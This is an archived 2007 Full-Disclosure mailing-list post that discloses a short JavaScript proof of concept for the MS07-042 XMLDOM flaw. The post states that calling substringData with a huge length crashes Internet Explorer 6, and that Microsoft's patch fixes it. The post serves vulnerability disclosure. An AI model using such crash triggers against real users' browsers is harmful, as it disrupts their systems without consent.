|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Full-disclosure] MS07-042 XMLDOM substringData() PoC
From: Alla Bezroutchko (alla
scanit.be)
Date: Thu Aug 16 2007 - 04:32:10 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This bit of JavaScript kills IE 6 on Windows 2000 and Windows XP SP2
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
xmlDoc.loadXML("<dummy></dummy>");
var txt = xmlDoc.createTextNode("huh");
var out = txt.substringData(1,0x7fffffff);
Installing the patch from MS07-042 fixes it.
Cheers,
Alla Bezroutchko
Scanit - http://www.scanit.be/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]